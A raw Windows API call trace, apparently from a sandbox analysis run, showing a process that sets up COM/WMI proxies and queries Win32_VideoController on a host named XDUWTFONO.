	[0222.689] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec120 | out: ppvObject=0x1c6ec120*=0x1b83c968) returned 0x0
	[0222.690] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c968, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec150 | out: pCid=0x1c6ec150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.690] WbemLocator:IUnknown:Release (This=0x1b83c968) returned 0x3
	[0222.690] CoGetContextToken (in: pToken=0x1c6ec130 | out: pToken=0x1c6ec130) returned 0x0
	[0222.690] WbemLocator:IUnknown:AddRef (This=0x1b83ca80) returned 0x4
	[0222.690] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec248 | out: ppvObject=0x1c6ec248*=0x1b83ca50) returned 0x0
	[0222.690] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x4
	[0222.690] WbemLocator:IRpcOptions:Query (in: This=0x1b83ca50, pPrx=0x1b83ca80, dwProperty=2, pdwValue=0x1c6ec2b8 | out: pdwValue=0x1c6ec2b8) returned 0x80004002
	[0222.690] WbemLocator:IUnknown:Release (This=0x1b83ca50) returned 0x3
	[0222.690] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x2
	[0222.690] CoGetContextToken (in: pToken=0x1c6ec630 | out: pToken=0x1c6ec630) returned 0x0
	[0222.690] CoGetContextToken (in: pToken=0x1c6ec570 | out: pToken=0x1c6ec570) returned 0x0
	[0222.690] WbemLocator:IUnknown:AddRef (This=0x1b83ca80) returned 0x3
	[0222.691] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x1c6ec6b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec690 | out: ppvObject=0x1c6ec690*=0x1cd1b6a8) returned 0x0
	[0222.691] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x3
	[0222.691] WbemLocator:IUnknown:Release (This=0x1cd1b6a8) returned 0x2
	[0222.691] WbemLocator:IUnknown:Release (This=0x1cd1b6a8) returned 0x1
	[0222.691] CoGetContextToken (in: pToken=0x1c6ecc30 | out: pToken=0x1c6ecc30) returned 0x0
	[0222.691] WbemLocator:IUnknown:AddRef (This=0x1b83ca80) returned 0x2
	[0222.691] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec800 | out: ppvObject=0x1c6ec800*=0x1b83ca80) returned 0x0
	[0222.691] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x2
	[0222.692] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x1
	[0222.692] CoGetContextToken (in: pToken=0x1c6ec8d0 | out: pToken=0x1c6ec8d0) returned 0x0
	[0222.692] CoGetContextToken (in: pToken=0x1c6ec810 | out: pToken=0x1c6ec810) returned 0x0
	[0222.692] WbemLocator:IUnknown:AddRef (This=0x1b83ca80) returned 0x2
	[0222.692] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83ca80, riid=0x1c6ec950*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec930 | out: ppvObject=0x1c6ec930*=0x1cd1b6a8) returned 0x0
	[0222.692] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x2
	[0222.692] WbemLocator:IUnknown:AddRef (This=0x1cd1b6a8) returned 0x3
	[0222.692] IWbemServices:ExecQuery (in: This=0x1cd1b6a8, strQueryLanguage="WQL", strQuery="select * from Win32_VideoController", lFlags=16, pCtx=0x0, ppEnum=0x1c6ecdc8 | out: ppEnum=0x1c6ecdc8*=0x1cd24cc8) returned 0x0
	[0222.702] IUnknown:QueryInterface (in: This=0x1cd24cc8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9d8 | out: ppvObject=0x1c6ec9d8*=0x1cd24cd0) returned 0x0
	[0222.702] IClientSecurity:QueryBlanket (in: This=0x1cd24cd0, pProxy=0x1cd24cc8, pAuthnSvc=0x1c6ec9d0, pAuthzSvc=0x1c6ec9cc, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8, pImpLevel=0x1c6ec9e4, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0 | out: pAuthnSvc=0x1c6ec9d0*=0xa, pAuthzSvc=0x1c6ec9cc*=0x0, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8*=0x6, pImpLevel=0x1c6ec9e4*=0x2, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0*=0x1) returned 0x0
	[0222.702] IUnknown:Release (This=0x1cd24cd0) returned 0x1
	[0222.702] IUnknown:QueryInterface (in: This=0x1cd24cc8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec978 | out: ppvObject=0x1c6ec978*=0x1b83c480) returned 0x0
	[0222.702] IUnknown:QueryInterface (in: This=0x1cd24cc8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec908 | out: ppvObject=0x1c6ec908*=0x1cd24cd0) returned 0x0
	[0222.702] IClientSecurity:SetBlanket (This=0x1cd24cd0, pProxy=0x1cd24cc8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0222.706] IUnknown:Release (This=0x1cd24cd0) returned 0x2
	[0222.706] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x1
	[0222.706] CoTaskMemFree (pv=0x1b8398f0) 
	[0222.706] IUnknown:QueryInterface (in: This=0x1cd24cc8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5b0 | out: ppvObject=0x1c6ec5b0*=0x1b83c480) returned 0x0
	[0222.706] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec630 | out: ppvObject=0x1c6ec630*=0x0) returned 0x80004002
	[0222.707] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec3c8 | out: ppvObject=0x1c6ec3c8*=0x0) returned 0x80004002
	[0222.711] WbemLocator:IUnknown:AddRef (This=0x1b83c480) returned 0x3
	[0222.711] CoGetContextToken (in: pToken=0x1c6ec280 | out: pToken=0x1c6ec280) returned 0x0
	[0222.711] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec240 | out: ppvObject=0x1c6ec240*=0x1b83c368) returned 0x0
	[0222.711] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83c368, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec270 | out: pCid=0x1c6ec270*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.711] WbemLocator:IUnknown:Release (This=0x1b83c368) returned 0x3
	[0222.712] CoGetContextToken (in: pToken=0x1c6ec250 | out: pToken=0x1c6ec250) returned 0x0
	[0222.712] WbemLocator:IUnknown:AddRef (This=0x1b83c480) returned 0x4
	[0222.712] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec368 | out: ppvObject=0x1c6ec368*=0x1b83c450) returned 0x0
	[0222.712] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x4
	[0222.712] WbemLocator:IRpcOptions:Query (in: This=0x1b83c450, pPrx=0x1b83c480, dwProperty=2, pdwValue=0x1c6ec3d8 | out: pdwValue=0x1c6ec3d8) returned 0x80004002
	[0222.712] WbemLocator:IUnknown:Release (This=0x1b83c450) returned 0x3
	[0222.712] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x2
	[0222.712] CoGetContextToken (in: pToken=0x1c6ec750 | out: pToken=0x1c6ec750) returned 0x0
	[0222.712] CoGetContextToken (in: pToken=0x1c6ec690 | out: pToken=0x1c6ec690) returned 0x0
	[0222.712] WbemLocator:IUnknown:AddRef (This=0x1b83c480) returned 0x3
	[0222.712] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x1c6ec7d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec7b0 | out: ppvObject=0x1c6ec7b0*=0x1cd24cc8) returned 0x0
	[0222.713] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x3
	[0222.713] IUnknown:Release (This=0x1cd24cc8) returned 0x2
	[0222.713] IUnknown:Release (This=0x1cd24cc8) returned 0x1
	[0222.713] WbemLocator:IUnknown:Release (This=0x1cd1b6a8) returned 0x2
	[0222.713] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1c640, puCount=0x1c6ecd70 | out: puCount=0x1c6ecd70*=0x2) returned 0x0
	[0222.713] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecd70*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd70*=0x17, pszText=0x0) returned 0x0
	[0222.713] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1c640, lFlags=4, puBuffLength=0x1c6ecd70*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd70*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.713] CoGetContextToken (in: pToken=0x1c6ec970 | out: pToken=0x1c6ec970) returned 0x0
	[0222.713] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0222.713] WbemLocator:IUnknown:AddRef (This=0x1b83c480) returned 0x2
	[0222.713] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83c480, riid=0x1c6ec9f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec9d0 | out: ppvObject=0x1c6ec9d0*=0x1cd24cc8) returned 0x0
	[0222.713] WbemLocator:IUnknown:Release (This=0x1b83c480) returned 0x2
	[0222.714] IUnknown:AddRef (This=0x1cd24cc8) returned 0x3
	[0222.714] IEnumWbemClassObject:Clone (in: This=0x1cd24cc8, ppEnum=0x1c6ece30 | out: ppEnum=0x1c6ece30*=0x1cd24e18) returned 0x0
	[0222.716] IUnknown:QueryInterface (in: This=0x1cd24e18, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca88 | out: ppvObject=0x1c6eca88*=0x1cd24e20) returned 0x0
	[0222.716] IClientSecurity:QueryBlanket (in: This=0x1cd24e20, pProxy=0x1cd24e18, pAuthnSvc=0x1c6eca80, pAuthzSvc=0x1c6eca7c, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78, pImpLevel=0x1c6eca94, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90 | out: pAuthnSvc=0x1c6eca80*=0xa, pAuthzSvc=0x1c6eca7c*=0x0, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78*=0x6, pImpLevel=0x1c6eca94*=0x2, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90*=0x1) returned 0x0
	[0222.716] IUnknown:Release (This=0x1cd24e20) returned 0x1
	[0222.716] IUnknown:QueryInterface (in: This=0x1cd24e18, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca28 | out: ppvObject=0x1c6eca28*=0x1b83cd80) returned 0x0
	[0222.716] IUnknown:QueryInterface (in: This=0x1cd24e18, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9b8 | out: ppvObject=0x1c6ec9b8*=0x1cd24e20) returned 0x0
	[0222.716] IClientSecurity:SetBlanket (This=0x1cd24e20, pProxy=0x1cd24e18, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0222.719] IUnknown:Release (This=0x1cd24e20) returned 0x2
	[0222.719] WbemLocator:IUnknown:Release (This=0x1b83cd80) returned 0x1
	[0222.719] CoTaskMemFree (pv=0x1b839aa0) 
	[0222.719] IUnknown:QueryInterface (in: This=0x1cd24e18, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec650 | out: ppvObject=0x1c6ec650*=0x1b83cd80) returned 0x0
	[0222.720] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83cd80, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec6d0 | out: ppvObject=0x1c6ec6d0*=0x0) returned 0x80004002
	[0222.720] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83cd80, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec468 | out: ppvObject=0x1c6ec468*=0x0) returned 0x80004002
	[0222.724] WbemLocator:IUnknown:AddRef (This=0x1b83cd80) returned 0x3
	[0222.724] CoGetContextToken (in: pToken=0x1c6ec320 | out: pToken=0x1c6ec320) returned 0x0
	[0222.724] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83cd80, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec2e0 | out: ppvObject=0x1c6ec2e0*=0x1b83cc68) returned 0x0
	[0222.725] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b83cc68, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec310 | out: pCid=0x1c6ec310*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.725] WbemLocator:IUnknown:Release (This=0x1b83cc68) returned 0x3
	[0222.725] CoGetContextToken (in: pToken=0x1c6ec2f0 | out: pToken=0x1c6ec2f0) returned 0x0
	[0222.725] WbemLocator:IUnknown:AddRef (This=0x1b83cd80) returned 0x4
	[0222.725] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83cd80, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec408 | out: ppvObject=0x1c6ec408*=0x1b83cd50) returned 0x0
	[0222.725] WbemLocator:IUnknown:Release (This=0x1b83cd80) returned 0x4
	[0222.725] WbemLocator:IRpcOptions:Query (in: This=0x1b83cd50, pPrx=0x1b83cd80, dwProperty=2, pdwValue=0x1c6ec478 | out: pdwValue=0x1c6ec478) returned 0x80004002
	[0222.725] WbemLocator:IUnknown:Release (This=0x1b83cd50) returned 0x3
	[0222.725] WbemLocator:IUnknown:Release (This=0x1b83cd80) returned 0x2
	[0222.725] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0222.725] CoGetContextToken (in: pToken=0x1c6ec730 | out: pToken=0x1c6ec730) returned 0x0
	[0222.725] WbemLocator:IUnknown:AddRef (This=0x1b83cd80) returned 0x3
	[0222.726] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83cd80, riid=0x1c6ec870*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec850 | out: ppvObject=0x1c6ec850*=0x1cd24e18) returned 0x0
	[0222.726] WbemLocator:IUnknown:Release (This=0x1b83cd80) returned 0x3
	[0222.726] IUnknown:Release (This=0x1cd24e18) returned 0x2
	[0222.726] IUnknown:Release (This=0x1cd24e18) returned 0x1
	[0222.726] IUnknown:Release (This=0x1cd24cc8) returned 0x2
	[0222.726] CoGetContextToken (in: pToken=0x1c6ecbf0 | out: pToken=0x1c6ecbf0) returned 0x0
	[0222.726] CoGetContextToken (in: pToken=0x1c6ecb30 | out: pToken=0x1c6ecb30) returned 0x0
	[0222.726] WbemLocator:IUnknown:AddRef (This=0x1b83cd80) returned 0x2
	[0222.726] WbemLocator:IUnknown:QueryInterface (in: This=0x1b83cd80, riid=0x1c6ecc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ecc50 | out: ppvObject=0x1c6ecc50*=0x1cd24e18) returned 0x0
	[0222.726] WbemLocator:IUnknown:Release (This=0x1b83cd80) returned 0x2
	[0222.726] IUnknown:AddRef (This=0x1cd24e18) returned 0x3
	[0222.727] IEnumWbemClassObject:Reset (This=0x1cd24e18) returned 0x0
	[0222.728] IUnknown:Release (This=0x1cd24e18) returned 0x2
	[0222.728] CoTaskMemAlloc (cb=0x8) returned 0x1b858db0
	[0222.728] IEnumWbemClassObject:Next (in: This=0x1cd24e18, lTimeout=-1, uCount=0x1, apObjects=0x1b858db0, puReturned=0x1c6ece78 | out: apObjects=0x1b858db0*=0x1cd1eb80, puReturned=0x1c6ece78*=0x1) returned 0x0
	[0222.738] IUnknown:QueryInterface (in: This=0x1cd1eb80, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec1a0 | out: ppvObject=0x1c6ec1a0*=0x1cd1eb80) returned 0x0
	[0222.739] IUnknown:QueryInterface (in: This=0x1cd1eb80, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec220 | out: ppvObject=0x1c6ec220*=0x0) returned 0x80004002
	[0222.739] IUnknown:QueryInterface (in: This=0x1cd1eb80, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ebfb8 | out: ppvObject=0x1c6ebfb8*=0x0) returned 0x80004002
	[0222.739] IUnknown:AddRef (This=0x1cd1eb80) returned 0x3
	[0222.739] CoGetContextToken (in: pToken=0x1c6ebe70 | out: pToken=0x1c6ebe70) returned 0x0
	[0222.739] IUnknown:QueryInterface (in: This=0x1cd1eb80, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebe30 | out: ppvObject=0x1c6ebe30*=0x1cd1eb88) returned 0x0
	[0222.739] IMarshal:GetUnmarshalClass (in: This=0x1cd1eb88, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebe60 | out: pCid=0x1c6ebe60*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0222.739] IUnknown:Release (This=0x1cd1eb88) returned 0x3
	[0222.740] CoGetContextToken (in: pToken=0x1c6ebe40 | out: pToken=0x1c6ebe40) returned 0x0
	[0222.740] IUnknown:AddRef (This=0x1cd1eb80) returned 0x4
	[0222.740] IUnknown:QueryInterface (in: This=0x1cd1eb80, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebf58 | out: ppvObject=0x1c6ebf58*=0x0) returned 0x80004002
	[0222.740] IUnknown:Release (This=0x1cd1eb80) returned 0x3
	[0222.740] IUnknown:Release (This=0x1cd1eb80) returned 0x2
	[0222.740] CoGetContextToken (in: pToken=0x1c6ec300 | out: pToken=0x1c6ec300) returned 0x0
	[0222.740] CoGetContextToken (in: pToken=0x1c6ec240 | out: pToken=0x1c6ec240) returned 0x0
	[0222.740] IUnknown:AddRef (This=0x1cd1eb80) returned 0x3
	[0222.740] IUnknown:QueryInterface (in: This=0x1cd1eb80, riid=0x1c6ec380*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec360 | out: ppvObject=0x1c6ec360*=0x1cd1eb80) returned 0x0
	[0222.740] IUnknown:Release (This=0x1cd1eb80) returned 0x3
	[0222.740] IUnknown:Release (This=0x1cd1eb80) returned 0x2
	[0222.741] IUnknown:Release (This=0x1cd1eb80) returned 0x1
	[0222.741] CoTaskMemFree (pv=0x1b858db0) 
	[0222.741] CoGetContextToken (in: pToken=0x1c6ecc80 | out: pToken=0x1c6ecc80) returned 0x0
	[0222.741] IUnknown:AddRef (This=0x1cd1eb80) returned 0x2
	[0222.741] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__GENUS", lFlags=0, pVal=0x1c6ecdf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecdec*=0, plFlavor=0x1c6ecde8*=0 | out: pVal=0x1c6ecdf0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ecdec*=3, plFlavor=0x1c6ecde8*=64) returned 0x0
	[0222.741] IWbemClassObject:Get (in: This=0x1cd1eb80, wszName="__PATH", lFlags=0, pVal=0x1c6ecd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd8c*=0, plFlavor=0x1c6ecd88*=0 | out: pVal=0x1c6ecd90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x1c6ecd8c*=8, plFlavor=0x1c6ecd88*=64) returned 0x0
	[0222.741] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x48
	[0222.741] CoGetObjectContext (in: riid=0x1c6ecd28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd20 | out: ppv=0x1c6ecd20*=0x321868) returned 0x0
	[0222.741] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd40 | out: pAptType=0x1c6ecd40*=1) returned 0x0
	[0222.741] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece48 | out: ppvObject=0x1c6ece48*=0x0) returned 0x80004002
	[0222.741] IUnknown:Release (This=0x321868) returned 0x1
	[0222.742] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec3b0 | out: ppv=0x1c6ec3b0*=0x1cd1e320) returned 0x0
	[0222.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1e320, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec0c0 | out: ppvObject=0x1c6ec0c0*=0x0) returned 0x80004002
